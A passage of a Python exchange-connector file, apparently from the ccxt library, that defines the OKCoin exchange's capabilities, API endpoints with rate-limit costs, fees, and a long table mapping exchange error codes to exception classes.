from ccxt.base.errors import CancelPending
from ccxt.base.errors import NotSupported
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
from ccxt.base.errors import InvalidNonce
from ccxt.base.errors import RequestTimeout
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class okcoin(Exchange):
def describe(self):
return self.deep_extend(super(okcoin, self).describe(), {
'id': 'okcoin',
'name': 'OKCoin',
'countries': ['CN', 'US'],
'version': 'v3',
# cheapest endpoint is 100 requests per 2 seconds
# 50 requests per second => 1000 / 50 = 20ms
'rateLimit': 20,
'pro': True,
'has': {
'CORS': None,
'spot': True,
'margin': None,
'swap': None,
'future': True,
'option': None,
'cancelOrder': True,
'createOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchCurrencies': True, # see below
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchLedger': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': None,
'fetchOrderTrades': True,
'fetchPosition': True,
'fetchPositions': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': None,
'fetchWithdrawals': True,
'transfer': True,
'withdraw': True,
},
'timeframes': {
'1m': '60',
'3m': '180',
'5m': '300',
'15m': '900',
'30m': '1800',
'1h': '3600',
'2h': '7200',
'4h': '14400',
'6h': '21600',
'12h': '43200',
'1d': '86400',
'1w': '604800',
'1M': '2678400',
'3M': '8035200',
'6M': '16070400',
'1y': '31536000',
},
'hostname': 'okcoin.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87295551-102fbf00-c50e-11ea-90a9-462eebba5829.jpg',
'api': {
'rest': 'https://www.{hostname}',
},
'www': 'https://www.okcoin.com',
'doc': 'https://www.okcoin.com/docs/en/',
'fees': 'https://www.okcoin.com/coin-fees',
'referral': 'https://www.okcoin.com/account/register?flag=activity&channelId=600001513',
'test': {
'rest': 'https://testnet.okex.com',
},
},
'api': {
'general': {
'get': {
'time': 8.3334,
},
},
'account': {
'get': {
'wallet': 8.3334,
'sub-account': 1000,
'asset-valuation': 1000,
'wallet/{currency}': 8.3334,
'withdrawal/history': 8.3334,
'withdrawal/history/{currency}': 8.3334,
'ledger': 5,
'deposit/address': 8.3334,
'deposit/history': 8.3334,
'deposit/history/{currency}': 8.3334,
'currencies': 8.3334,
'withdrawal/fee': 8.3334,
'deposit-lightning': 50,
'withdrawal-lightning': 50,
'fiat/deposit/detail': 5,
'fiat/deposit/details': 8.3334,
'fiat/withdraw/detail': 5,
'fiat/withdraw/details': 8.3334,
'fiat/channel': 8.3334,
},
'post': {
'transfer': 100, # 1 request per 2 seconds(per currency)
'withdrawal': 8.3334,
'fiat/cancel_deposit': 1,
'fiat/deposit': 8.3334,
'fiat/withdraw': 8.3334,
'fiat/cancel_withdrawal': 1,
},
},
# TODO fix signing issue in sign()
# all other endpoints of the format
# api/account/v3/wallet
# otc endpoints actually of the format: (exchanged places)
# api/v3/otc/rfq/instruments
'otc': {
'get': {
'rfq/instruments': 50, # represents: GET api/v3/otc/rfq/instruments
'rfq/trade': 50,
'rfq/history': 50,
},
'post': {
'rfq/quote': 50,
'rfq/trade': 50,
},
},
# TODO fix signing issue as above
'users': {
'get': {
'subaccount-info': 20,
'account-info': 20,
'subaccount/apikey': 20,
},
'post': {
'create-subaccount': 5, # represents: POST api/v3/users/create-subaccount
'delete-subaccount': 5,
'subaccount/apikey': 50,
'subacount/delete-apikey': 20,
'subacount/modify-apikey': 20,
},
},
'earning': {
'get': {
'offers': 5,
'orders': 5,
'positions': 8.3334,
},
'post': {
'purchase': 5,
'redeem': 5,
'cancel': 5,
},
},
'spot': {
'get': {
'accounts': 5,
'accounts/{currency}': 5,
'accounts/{currency}/ledger': 5,
'orders': 10,
'orders_pending': 5,
'orders/{order_id}': 5,
'orders/{client_oid}': 5,
'trade_fee': 5,
'fills': 10,
'algo': 5,
# public
'instruments': 5,
'instruments/{instrument_id}/book': 5,
'instruments/ticker': 5,
'instruments/{instrument_id}/ticker': 5,
'instruments/{instrument_id}/trades': 5,
'instruments/{instrument_id}/candles': 5,
},
'post': {
'order_algo': 2.5,
'orders': 1,
'batch_orders': 2,
'cancel_orders/{order_id}': 1,
'cancel_orders/{client_oid}': 1,
'cancel_batch_algos': 5,
'cancel_batch_orders': 5,
'amend_order/{instrument_id}': 2.5,
'amend_batch_orders': 5,
},
},
'margin': {
'get': {
'accounts': 5,
'accounts/{instrument_id}': 5,
'accounts/{instrument_id}/ledger': 5,
'accounts/availability': 5,
'accounts/{instrument_id}/availability': 5,
'accounts/borrowed': 5,
'accounts/{instrument_id}/borrowed': 5,
'orders': 10,
'accounts/{instrument_id}/leverage': 1,
'orders/{order_id}': 5,
'orders/{client_oid}': 5,
'orders_pending': 5,
'fills': 10,
# public
'instruments/{instrument_id}/mark_price': 5,
},
'post': {
'accounts/borrow': 1,
'accounts/repayment': 1,
'orders': 1,
'batch_orders': 2,
'cancel_orders': 1,
'cancel_orders/{order_id}': 1,
'cancel_orders/{client_oid}': 1,
'cancel_batch_orders': 2,
'amend_order/{instrument_id}': 2.5,
'amend_batch_orders': 5,
'accounts/{instrument_id}/leverage': 1,
},
},
'system': {
'get': {
'status': 250,
},
},
'market': {
'get': {
'oracle': 250,
},
},
'futures': {
'get': [
'position',
'{instrument_id}/position',
'accounts',
'accounts/{underlying}',
'accounts/{underlying}/leverage',
'accounts/{underlying}/ledger',
'order_algo/{instrument_id}',
'orders/{instrument_id}',
'orders/{instrument_id}/{order_id}',
'orders/{instrument_id}/{client_oid}',
'fills',
'trade_fee',
'accounts/{instrument_id}/holds',
'order_algo/{instrument_id}',
# public
'instruments',
'instruments/{instrument_id}/book',
'instruments/ticker',
'instruments/{instrument_id}/ticker',
'instruments/{instrument_id}/trades',
'instruments/{instrument_id}/candles',
'instruments/{instrument_id}/history/candles',
'instruments/{instrument_id}/index',
'rate',
'instruments/{instrument_id}/estimated_price',
'instruments/{instrument_id}/open_interest',
'instruments/{instrument_id}/price_limit',
'instruments/{instrument_id}/mark_price',
'instruments/{instrument_id}/liquidation',
],
'post': [
'accounts/{underlying}/leverage',
'order',
'amend_order/{instrument_id}',
'orders',
'cancel_order/{instrument_id}/{order_id}',
'cancel_order/{instrument_id}/{client_oid}',
'cancel_batch_orders/{instrument_id}',
'accounts/margin_mode',
'close_position',
'cancel_all',
'order_algo',
'cancel_algos',
],
},
'swap': {
'get': [
'position',
'{instrument_id}/position',
'accounts',
'{instrument_id}/accounts',
'accounts/{instrument_id}/settings',
'accounts/{instrument_id}/ledger',
'orders/{instrument_id}',
'orders/{instrument_id}/{order_id}',
'orders/{instrument_id}/{client_oid}',
'fills',
'accounts/{instrument_id}/holds',
'trade_fee',
'order_algo/{instrument_id}',
# public
'instruments',
'instruments/{instrument_id}/depth',
'instruments/ticker',
'instruments/{instrument_id}/ticker',
'instruments/{instrument_id}/trades',
'instruments/{instrument_id}/candles',
'instruments/{instrument_id}/history/candles',
'instruments/{instrument_id}/index',
'rate',
'instruments/{instrument_id}/open_interest',
'instruments/{instrument_id}/price_limit',
'instruments/{instrument_id}/liquidation',
'instruments/{instrument_id}/funding_time',
'instruments/{instrument_id}/mark_price',
'instruments/{instrument_id}/historical_funding_rate',
],
'post': [
'accounts/{instrument_id}/leverage',
'order',
'amend_order/{instrument_id}',
'orders',
'cancel_order/{instrument_id}/{order_id}',
'cancel_order/{instrument_id}/{client_oid}',
'cancel_batch_orders/{instrument_id}',
'order_algo',
'cancel_algos',
'close_position',
'cancel_all',
'order_algo',
'cancel_algos',
],
},
'option': {
'get': [
'accounts',
'position',
'{underlying}/position',
'accounts/{underlying}',
'orders/{underlying}',
'fills/{underlying}',
'accounts/{underlying}/ledger',
'trade_fee',
'orders/{underlying}/{order_id}',
'orders/{underlying}/{client_oid}',
# public
'underlying',
'instruments/{underlying}',
'instruments/{underlying}/summary',
'instruments/{underlying}/summary/{instrument_id}',
'instruments/{instrument_id}/book',
'instruments/{instrument_id}/trades',
'instruments/{instrument_id}/ticker',
'instruments/{instrument_id}/candles',
],
'post': [
'order',
'orders',
'cancel_order/{underlying}/{order_id}',
'cancel_order/{underlying}/{client_oid}',
'cancel_batch_orders/{underlying}',
'amend_order/{underlying}',
'amend_batch_orders/{underlying}',
],
},
'information': {
'get': [
'{currency}/long_short_ratio',
'{currency}/volume',
'{currency}/taker',
'{currency}/sentiment',
'{currency}/margin',
],
},
'index': {
'get': [
'{instrument_id}/constituents',
],
},
},
'fees': {
'trading': {
'taker': 0.002,
'maker': 0.001,
},
'spot': {
'taker': 0.0015,
'maker': 0.0010,
},
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'password': True,
},
'exceptions': {
# http error codes
# 400 Bad Request — Invalid request format
# 401 Unauthorized — Invalid API Key
# 403 Forbidden — You do not have access to the requested resource
# 404 Not Found
# 429 Client Error: Too Many Requests for url
# 500 Internal Server Error — We had a problem with our server
'exact': {
'1': ExchangeError, # {"code": 1, "message": "System error"}
# undocumented
'failure to get a peer from the ring-balancer': ExchangeNotAvailable, # {"message": "failure to get a peer from the ring-balancer"}
'Server is busy, please try again.': ExchangeNotAvailable, # {"message": "Server is busy, please try again."}
'An unexpected error occurred': ExchangeError, # {"message": "An unexpected error occurred"}
'System error': ExchangeError, # {"error_message":"System error","message":"System error"}
'4010': PermissionDenied, # {"code": 4010, "message": "For the security of your funds, withdrawals are not permitted within 24 hours after changing fund password / mobile number / Google Authenticator settings "}
# common
# '0': ExchangeError, # 200 successful,when the order placement / cancellation / operation is successful
'4001': ExchangeError, # no data received in 30s
'4002': ExchangeError, # Buffer full. cannot write data
# --------------------------------------------------------
'30001': AuthenticationError, # {"code": 30001, "message": 'request header "OK_ACCESS_KEY" cannot be blank'}
'30002': AuthenticationError, # {"code": 30002, "message": 'request header "OK_ACCESS_SIGN" cannot be blank'}
'30003': AuthenticationError, # {"code": 30003, "message": 'request header "OK_ACCESS_TIMESTAMP" cannot be blank'}
'30004': AuthenticationError, # {"code": 30004, "message": 'request header "OK_ACCESS_PASSPHRASE" cannot be blank'}
'30005': InvalidNonce, # {"code": 30005, "message": "invalid OK_ACCESS_TIMESTAMP"}
'30006': AuthenticationError, # {"code": 30006, "message": "invalid OK_ACCESS_KEY"}
'30007': BadRequest, # {"code": 30007, "message": 'invalid Content_Type, please use "application/json" format'}
'30008': RequestTimeout, # {"code": 30008, "message": "timestamp request expired"}
'30009': ExchangeError, # {"code": 30009, "message": "system error"}
'30010': AuthenticationError, # {"code": 30010, "message": "API validation failed"}
'30011': PermissionDenied, # {"code": 30011, "message": "invalid IP"}
'30012': AuthenticationError, # {"code": 30012, "message": "invalid authorization"}
'30013': AuthenticationError, # {"code": 30013, "message": "invalid sign"}
'30014': DDoSProtection, # {"code": 30014, "message": "request too frequent"}
'30015': AuthenticationError, # {"code": 30015, "message": 'request header "OK_ACCESS_PASSPHRASE" incorrect'}
'30016': ExchangeError, # {"code": 30015, "message": "you are using v1 apiKey, please use v1 endpoint. If you would like to use v3 endpoint, please subscribe to v3 apiKey"}
'30017': ExchangeError, # {"code": 30017, "message": "apikey's broker id does not match"}
'30018': ExchangeError, # {"code": 30018, "message": "apikey's domain does not match"}
'30019': ExchangeNotAvailable, # {"code": 30019, "message": "Api is offline or unavailable"}
'30020': BadRequest, # {"code": 30020, "message": "body cannot be blank"}
'30021': BadRequest, # {"code": 30021, "message": "Json data format error"}, {"code": 30021, "message": "json data format error"}
'30022': PermissionDenied, # {"code": 30022, "message": "Api has been frozen"}
'30023': BadRequest, # {"code": 30023, "message": "{0} parameter cannot be blank"}
'30024': BadSymbol, # {"code":30024,"message":"\"instrument_id\" is an invalid parameter"}
'30025': BadRequest, # {"code": 30025, "message": "{0} parameter category error"}
'30026': DDoSProtection, # {"code": 30026, "message": "requested too frequent"}
'30027': AuthenticationError, # {"code": 30027, "message": "login failure"}
'30028': PermissionDenied, # {"code": 30028, "message": "unauthorized execution"}
'30029': AccountSuspended, # {"code": 30029, "message": "account suspended"}
'30030': ExchangeNotAvailable, # {"code": 30030, "message": "endpoint request failed. Please try again"}
'30031': BadRequest, # {"code": 30031, "message": "token does not exist"}
'30032': BadSymbol, # {"code": 30032, "message": "pair does not exist"}
'30033': BadRequest, # {"code": 30033, "message": "exchange domain does not exist"}
'30034': ExchangeError, # {"code": 30034, "message": "exchange ID does not exist"}
'30035': ExchangeError, # {"code": 30035, "message": "trading is not supported in this website"}
'30036': ExchangeError, # {"code": 30036, "message": "no relevant data"}
'30037': ExchangeNotAvailable, # {"code": 30037, "message": "endpoint is offline or unavailable"}
# '30038': AuthenticationError, # {"code": 30038, "message": "user does not exist"}
'30038': OnMaintenance, # {"client_oid":"","code":"30038","error_code":"30038","error_message":"Matching engine is being upgraded. Please try in about 1 minute.","message":"Matching engine is being upgraded. Please try in about 1 minute.","order_id":"-1","result":false}
'30044': RequestTimeout, # {"code":30044, "message":"Endpoint request timeout"}
# futures
'32001': AccountSuspended, # {"code": 32001, "message": "futures account suspended"}
'32002': PermissionDenied, # {"code": 32002, "message": "futures account does not exist"}
'32003': CancelPending, # {"code": 32003, "message": "canceling, please wait"}
'32004': ExchangeError, # {"code": 32004, "message": "you have no unfilled orders"}
'32005': InvalidOrder, # {"code": 32005, "message": "max order quantity"}
'32006': InvalidOrder, # {"code": 32006, "message": "the order price or trigger price exceeds USD 1 million"}
'32007': InvalidOrder, # {"code": 32007, "message": "leverage level must be the same for orders on the same side of the contract"}
'32008': InvalidOrder, # {"code": 32008, "message": "Max. positions to open(cross margin)"}
'32009': InvalidOrder, # {"code": 32009, "message": "Max. positions to open(fixed margin)"}
'32010': ExchangeError, # {"code": 32010, "message": "leverage cannot be changed with open positions"}
'32011': ExchangeError, # {"code": 32011, "message": "futures status error"}
'32012': ExchangeError, # {"code": 32012, "message": "futures order update error"}
'32013': ExchangeError, # {"code": 32013, "message": "token type is blank"}
'32014': ExchangeError, # {"code": 32014, "message": "your number of contracts closing is larger than the number of contracts available"}
'32015': ExchangeError, # {"code": 32015, "message": "margin ratio is lower than 100% before opening positions"}
'32016': ExchangeError, # {"code": 32016, "message": "margin ratio is lower than 100% after opening position"}
'32017': ExchangeError, # {"code": 32017, "message": "no BBO"}
'32018': ExchangeError, # {"code": 32018, "message": "the order quantity is less than 1, please try again"}
'32019': ExchangeError, # {"code": 32019, "message": "the order price deviates from the price of the previous minute by more than 3%"}
'32020': ExchangeError, # {"code": 32020, "message": "the price is not in the range of the price limit"}
'32021': ExchangeError, # {"code": 32021, "message": "leverage error"}
'32022': ExchangeError, # {"code": 32022, "message": "this function is not supported in your country or region according to the regulations"}
'32023': ExchangeError, # {"code": 32023, "message": "this account has outstanding loan"}
'32024': ExchangeError, # {"code": 32024, "message": "order cannot be placed during delivery"}
'32025': ExchangeError, # {"code": 32025, "message": "order cannot be placed during settlement"}
'32026': ExchangeError, # {"code": 32026, "message": "your account is restricted from opening positions"}
'32027': ExchangeError, # {"code": 32027, "message": "cancelled over 20 orders"}
'32028': ExchangeError, # {"code": 32028, "message": "account is suspended and liquidated"}
'32029': ExchangeError, # {"code": 32029, "message": "order info does not exist"}
'32030': InvalidOrder, # The order cannot be cancelled
'32031': ArgumentsRequired, # client_oid or order_id is required.
'32038': AuthenticationError, # User does not exist
'32040': ExchangeError, # User have open contract orders or position
'32044': ExchangeError, # {"code": 32044, "message": "The margin ratio after submitting this order is lower than the minimum requirement({0}) for your tier."}
'32045': ExchangeError, # String of commission over 1 million
'32046': ExchangeError, # Each user can hold up to 10 trade plans at the same time
'32047': ExchangeError, # system error
'32048': InvalidOrder, # Order strategy track range error
'32049': ExchangeError, # Each user can hold up to 10 track plans at the same time
'32050': InvalidOrder, # Order strategy rang error
'32051': InvalidOrder, # Order strategy ice depth error
'32052': ExchangeError, # String of commission over 100 thousand
'32053': ExchangeError, # Each user can hold up to 6 ice plans at the same time
'32057': ExchangeError, # The order price is zero. Market-close-all function cannot be executed
'32054': ExchangeError, # Trade not allow
'32055': InvalidOrder, # cancel order error
'32056': ExchangeError, # iceberg per order average should between {0}-{1} contracts
'32058': ExchangeError, # Each user can hold up to 6 initiative plans at the same time
'32059': InvalidOrder, # Total amount should exceed per order amount
'32060': InvalidOrder, # Order strategy type error
'32061': InvalidOrder, # Order strategy initiative limit error
'32062': InvalidOrder, # Order strategy initiative range error
'32063': InvalidOrder, # Order strategy initiative rate error
'32064': ExchangeError, # Time interval of orders should be set between 5-120s
'32065': ExchangeError, # Close amount exceeds the limit of Market-close-all(999 for BTC, and 9999 for the rest tokens)
'32066': ExchangeError, # You have open orders. Please cancel all open orders before changing your leverage level.
'32067': ExchangeError, # Account equity < required margin in this setting. Please adjust your leverage level again.
'32068': ExchangeError, # The margin for this position will fall short of the required margin in this setting. Please adjust your leverage level or increase your margin to proceed.
'32069': ExchangeError, # Target leverage level too low. Your account balance is insufficient to cover the margin required. Please adjust the leverage level again.
'32070': ExchangeError, # Please check open position or unfilled order
'32071': ExchangeError, # Your current liquidation mode does not support this action.
'32072': ExchangeError, # The highest available margin for your order’s tier is {0}. Please edit your margin and place a new order.
'32073': ExchangeError, # The action does not apply to the token
'32074': ExchangeError, # The number of contracts of your position, open orders, and the current order has exceeded the maximum order limit of this asset.
'32075': ExchangeError, # Account risk rate breach
'32076': ExchangeError, # Liquidation of the holding position(s) at market price will require cancellation of all pending close orders of the contracts.
'32077': ExchangeError, # Your margin for this asset in futures account is insufficient and the position has been taken over for liquidation.(You will not be able to place orders, close positions, transfer funds, or add margin during this period of time. Your account will be restored after the liquidation is complete.)
'32078': ExchangeError, # Please cancel all open orders before switching the liquidation mode(Please cancel all open orders before switching the liquidation mode)
'32079': ExchangeError, # Your open positions are at high risk.(Please add margin or reduce positions before switching the mode)
'32080': ExchangeError, # Funds cannot be transferred out within 30 minutes after futures settlement
'32083': ExchangeError, # The number of contracts should be a positive multiple of %%. Please place your order again
# token and margin trading
'33001': PermissionDenied, # {"code": 33001, "message": "margin account for this pair is not enabled yet"}
'33002': AccountSuspended, # {"code": 33002, "message": "margin account for this pair is suspended"}
'33003': InsufficientFunds, # {"code": 33003, "message": "no loan balance"}
'33004': ExchangeError, # {"code": 33004, "message": "loan amount cannot be smaller than the minimum limit"}
'33005': ExchangeError, # {"code": 33005, "message": "repayment amount must exceed 0"}
'33006': ExchangeError, # {"code": 33006, "message": "loan order not found"}
'33007': ExchangeError, # {"code": 33007, "message": "status not found"}
'33008': InsufficientFunds, # {"code": 33008, "message": "loan amount cannot exceed the maximum limit"}
'33009': ExchangeError, # {"code": 33009, "message": "user ID is blank"}
'33010': ExchangeError, # {"code": 33010, "message": "you cannot cancel an order during session 2 of call auction"}
'33011': ExchangeError, # {"code": 33011, "message": "no new market data"}
'33012': ExchangeError, # {"code": 33012, "message": "order cancellation failed"}
'33013': InvalidOrder, # {"code": 33013, "message": "order placement failed"}
'33014': OrderNotFound, # {"code": 33014, "message": "order does not exist"}
'33015': InvalidOrder, # {"code": 33015, "message": "exceeded maximum limit"}
'33016': ExchangeError, # {"code": 33016, "message": "margin trading is not open for this token"}
'33017': InsufficientFunds, # {"code": 33017, "message": "insufficient balance"}
'33018': ExchangeError, # {"code": 33018, "message": "this parameter must be smaller than 1"}
'33020': ExchangeError, # {"code": 33020, "message": "request not supported"}
'33021': BadRequest, # {"code": 33021, "message": "token and the pair do not match"}
'33022': InvalidOrder, # {"code": 33022, "message": "pair and the order do not match"}
'33023': ExchangeError, # {"code": 33023, "message": "you can only place market orders during call auction"}
'33024': InvalidOrder, # {"code": 33024, "message": "trading amount too small"}
'33025': InvalidOrder, # {"code": 33025, "message": "base token amount is blank"}
'33026': ExchangeError, # {"code": 33026, "message": "transaction completed"}
'33027': InvalidOrder, # {"code": 33027, "message": "cancelled order or order cancelling"}
'33028': InvalidOrder, # {"code": 33028, "message": "the decimal places of the trading price exceeded the limit"}
'33029': InvalidOrder, # {"code": 33029, "message": "the decimal places of the trading size exceeded the limit"}
'33034': ExchangeError, # {"code": 33034, "message": "You can only place limit order after Call Auction has started"}
'33035': ExchangeError, # This type of order cannot be canceled(This type of order cannot be canceled)
'33036': ExchangeError, # Exceeding the limit of entrust order
'33037': ExchangeError, # The buy order price should be lower than 130% of the trigger price
'33038': ExchangeError, # The sell order price should be higher than 70% of the trigger price
'33039': ExchangeError, # The limit of callback rate is 0 < x <= 5%
'33040': ExchangeError, # The trigger price of a buy order should be lower than the latest transaction price
'33041': ExchangeError, # The trigger price of a sell order should be higher than the latest transaction price
'33042': ExchangeError, # The limit of price variance is 0 < x <= 1%
'33043': ExchangeError, # The total amount must be larger than 0
'33044': ExchangeError, # The average amount should be 1/1000 * total amount <= x <= total amount
'33045': ExchangeError, # The price should not be 0, including trigger price, order price, and price limit
'33046': ExchangeError, # Price variance should be 0 < x <= 1%
'33047': ExchangeError, # Sweep ratio should be 0 < x <= 100%
'33048': ExchangeError, # Per order limit: Total amount/1000 < x <= Total amount
'33049': ExchangeError, # Total amount should be X > 0
'33050': ExchangeError, # Time interval should be 5 <= x <= 120s
'33051': ExchangeError, # cancel order number not higher limit: plan and track entrust no more than 10, ice and time entrust no more than 6
'33059': BadRequest, # {"code": 33059, "message": "client_oid or order_id is required"}
'33060': BadRequest, # {"code": 33060, "message": "Only fill in either parameter client_oid or order_id"}
'33061': ExchangeError, # Value of a single market price order cannot exceed 100,000 USD
'33062': ExchangeError, # The leverage ratio is too high. The borrowed position has exceeded the maximum position of this leverage ratio. Please readjust the leverage ratio
'33063': ExchangeError, # Leverage multiple is too low, there is insufficient margin in the account, please readjust the leverage ratio
'33064': ExchangeError, # The setting of the leverage ratio cannot be less than 2, please readjust the leverage ratio
'33065': ExchangeError, # Leverage ratio exceeds maximum leverage ratio, please readjust leverage ratio
'33085': InvalidOrder, # The value of the position and buying order has reached the position limit, and no further buying is allowed.
# account
'21009': ExchangeError, # Funds cannot be transferred out within 30 minutes after swap settlement(Funds cannot be transferred out within 30 minutes after swap settlement)
'34001': PermissionDenied, # {"code": 34001, "message": "withdrawal suspended"}
'34002': InvalidAddress, # {"code": 34002, "message": "please add a withdrawal address"}
'34003': ExchangeError, # {"code": 34003, "message": "sorry, this token cannot be withdrawn to xx at the moment"}
'34004': ExchangeError, # {"code": 34004, "message": "withdrawal fee is smaller than minimum limit"}
'34005': ExchangeError, # {"code": 34005, "message": "withdrawal fee exceeds the maximum limit"}
'34006': ExchangeError, # {"code": 34006, "message": "withdrawal amount is lower than the minimum limit"}
'34007': ExchangeError, # {"code": 34007, "message": "withdrawal amount exceeds the maximum limit"}
'34008': InsufficientFunds, # {"code": 34008, "message": "insufficient balance"}
'34009': ExchangeError, # {"code": 34009, "message": "your withdrawal amount exceeds the daily limit"}
'34010': ExchangeError, # {"code": 34010, "message": "transfer amount must be larger than 0"}
'34011': ExchangeError, # {"code": 34011, "message": "conditions not met"}
'34012': ExchangeError, # {"code": 34012, "message": "the minimum withdrawal amount for NEO is 1, and the amount must be an integer"}
'34013': ExchangeError, # {"code": 34013, "message": "please transfer"}
'34014': ExchangeError, # {"code": 34014, "message": "transfer limited"}
'34015': ExchangeError, # {"code": 34015, "message": "subaccount does not exist"}
'34016': PermissionDenied, # {"code": 34016, "message": "transfer suspended"}
'34017': AccountSuspended, # {"code": 34017, "message": "account suspended"}
'34018': AuthenticationError, # {"code": 34018, "message": "incorrect trades password"}
'34019': PermissionDenied, # {"code": 34019, "message": "please bind your email before withdrawal"}
'34020': PermissionDenied, # {"code": 34020, "message": "please bind your funds password before withdrawal"}
'34021': InvalidAddress, # {"code": 34021, "message": "Not verified address"}
'34022': ExchangeError, # {"code": 34022, "message": "Withdrawals are not available for sub accounts"}
'34023': PermissionDenied, # {"code": 34023, "message": "Please enable futures trading before transferring your funds"}
'34026': RateLimitExceeded, # transfer too frequently(transfer too frequently)
'34036': ExchangeError, # Parameter is incorrect, please refer to API documentation
'34037': ExchangeError, # Get the sub-account balance interface, account type is not supported
'34038': ExchangeError, # Since your C2C transaction is unusual, you are restricted from fund transfer. Please contact our customer support to cancel the restriction
'34039': ExchangeError, # You are now restricted from transferring out your funds due to abnormal trades on C2C Market. Please transfer your fund on our website or app instead to verify your identity
# swap
'35001': ExchangeError, # {"code": 35001, "message": "Contract does not exist"}
'35002': ExchangeError, # {"code": 35002, "message": "Contract settling"}
'35003': ExchangeError, # {"code": 35003, "message": "Contract paused"}
'35004': ExchangeError, # {"code": 35004, "message": "Contract pending settlement"}
'35005': AuthenticationError, # {"code": 35005, "message": "User does not exist"}
'35008': InvalidOrder, # {"code": 35008, "message": "Risk ratio too high"}
'35010': InvalidOrder, # {"code": 35010, "message": "Position closing too large"}
'35012': InvalidOrder, # {"code": 35012, "message": "Incorrect order size"}
'35014': InvalidOrder, # {"code": 35014, "message": "Order price is not within limit"}
'35015': InvalidOrder, # {"code": 35015, "message": "Invalid leverage level"}
'35017': ExchangeError, # {"code": 35017, "message": "Open orders exist"}
'35019': InvalidOrder, # {"code": 35019, "message": "Order size too large"}
'35020': InvalidOrder, # {"code": 35020, "message": "Order price too high"}
'35021': InvalidOrder, # {"code": 35021, "message": "Order size exceeded current tier limit"}
'35022': BadRequest, # {"code": 35022, "message": "Contract status error"}
'35024': BadRequest, # {"code": 35024, "message": "Contract not initialized"}
'35025': InsufficientFunds, # {"code": 35025, "message": "No account balance"}
'35026': BadRequest, # {"code": 35026, "message": "Contract settings not initialized"}
'35029': OrderNotFound, # {"code": 35029, "message": "Order does not exist"}
'35030': InvalidOrder, # {"code": 35030, "message": "Order size too large"}
'35031': InvalidOrder, # {"code": 35031, "message": "Cancel order size too large"}
'35032': ExchangeError, # {"code": 35032, "message": "Invalid user status"}
'35037': ExchangeError, # No last traded price in cache
'35039': InsufficientFunds, # {"code": 35039, "message": "Open order quantity exceeds limit"}
'35040': InvalidOrder, # {"error_message":"Invalid order type","result":"true","error_code":"35040","order_id":"-1"}
'35044': ExchangeError, # {"code": 35044, "message": "Invalid order status"}
'35046': InsufficientFunds, # {"code": 35046, "message": "Negative account balance"}
'35047': InsufficientFunds, # {"code": 35047, "message": "Insufficient account balance"}
'35048': ExchangeError, # {"code": 35048, "message": "User contract is frozen and liquidating"}
'35049': InvalidOrder, # {"code": 35049, "message": "Invalid order type"}
'35050': InvalidOrder, # {"code": 35050, "message": "Position settings are blank"}
'35052': InsufficientFunds, # {"code": 35052, "message": "Insufficient cross margin"}
'35053': ExchangeError, # {"code": 35053, "message": "Account risk too high"}
'35055': InsufficientFunds, # {"code": 35055, "message": "Insufficient account balance"}
'35057': ExchangeError, # {"code": 35057, "message": "No last traded price"}
'35058': ExchangeError, # {"code": 35058, "message": "No limit"}
'35059': BadRequest, # {"code": 35059, "message": "client_oid or order_id is required"}
'35060': BadRequest, # {"code": 35060, "message": "Only fill in either parameter client_oid or order_id"}
'35061': BadRequest, # {"code": 35061, "message": "Invalid instrument_id"}
'35062': InvalidOrder, # {"code": 35062, "message": "Invalid match_price"}
'35063': InvalidOrder, # {"code": 35063, "message": "Invalid order_size"}
'35064': InvalidOrder, # {"code": 35064, "message": "Invalid client_oid"}
'35066': InvalidOrder, # Order interval error
'35067': InvalidOrder, # Time-weighted order ratio error
'35068': InvalidOrder, # Time-weighted order range error
'35069': InvalidOrder, # Time-weighted single transaction limit error
'35070': InvalidOrder, # Algo order type error
'35071': InvalidOrder, # Order total must be larger than single order limit
'35072': InvalidOrder, # Maximum 6 unfulfilled time-weighted orders can be held at the same time
'35073': InvalidOrder, # Order price is 0. Market-close-all not available
'35074': InvalidOrder, # Iceberg order single transaction average error
'35075': InvalidOrder, # Failed to cancel order
'35076': InvalidOrder, # LTC 20x leverage. Not allowed to open position
'35077': InvalidOrder, # Maximum 6 unfulfilled iceberg orders can be held at the same time
'35078': InvalidOrder, # Order amount exceeded 100,000
'35079': InvalidOrder, # Iceberg order price variance error
'35080': InvalidOrder, # Callback rate error
'35081': InvalidOrder, # Maximum 10 unfulfilled trail orders can be held at the same time
'35082': InvalidOrder, # Trail order callback rate error
'35083': InvalidOrder, # Each user can only hold a maximum of 10 unfulfilled stop-limit orders at the same time
'35084': InvalidOrder, # Order amount exceeded 1 million
'35085': InvalidOrder, # Order amount is not in the correct range
'35086': InvalidOrder, # Price exceeds 100 thousand
'35087': InvalidOrder, # Price exceeds 100 thousand
'35088': InvalidOrder, # Average amount error
'35089': InvalidOrder, # Price exceeds 100 thousand
'35090': ExchangeError, # No stop-limit orders available for cancelation
'35091': ExchangeError, # No trail orders available for cancellation
'35092': ExchangeError, # No iceberg orders available for cancellation
'35093': ExchangeError, # No trail orders available for cancellation
'35094': ExchangeError, # Stop-limit order last traded price error
'35095': BadRequest, # Instrument_id error
'35096': ExchangeError, # Algo order status error
'35097': ExchangeError, # Order status and order ID cannot exist at the same time
'35098': ExchangeError, # An order status or order ID must exist
'35099': ExchangeError, # Algo order ID error
'35102': RateLimitExceeded, # {"error_message":"The operation that close all at market price is too frequent","result":"true","error_code":"35102","order_id":"-1"}
# option
'36001': BadRequest, # Invalid underlying index.
'36002': BadRequest, # Instrument does not exist.
'36005': ExchangeError, # Instrument status is invalid.
'36101': AuthenticationError, # Account does not exist.
'36102': PermissionDenied, # Account status is invalid.
'36103': PermissionDenied, # Account is suspended due to ongoing liquidation.
'36104': PermissionDenied, # Account is not enabled for options trading.
'36105': PermissionDenied, # Please enable the account for option contract.
'36106': PermissionDenied, # Funds cannot be transferred in or out, as account is suspended.
'36107': PermissionDenied, # Funds cannot be transferred out within 30 minutes after option exercising or settlement.
